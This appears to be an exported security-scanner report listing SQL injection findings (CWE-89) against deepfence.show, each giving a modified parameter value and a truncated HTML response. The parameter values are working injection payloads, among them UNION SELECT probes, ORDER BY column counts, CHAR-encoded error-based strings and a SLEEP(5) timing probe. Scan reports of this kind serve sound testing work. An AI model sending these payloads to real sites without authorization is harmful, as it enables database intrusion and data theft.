systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #545\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #546\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 15--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #547\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #548\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+\nCHAR(116)+CHAR(69)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #549\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1' GROUP BY 1,2,3--+ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #550\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 1=0 AND '%'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #551\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=\ndevice-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/\nhead/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> \nwindow.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of\nZendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://\nstatic.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> <\n/script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link\nrel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWF\nnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoq\nIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary hints \non your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #552\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io1*56\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #553\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\" or \"\"&\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #554\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),4#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #555\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #556\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(\n88)+CHAR(88)+CHAR(88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #557\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@deepfence.io UNION ALL SELECT 1,2,3,4,5\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #558\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 2#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@deepfence.io\nCWE-ID CWE-89\nIssue Number #559\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified 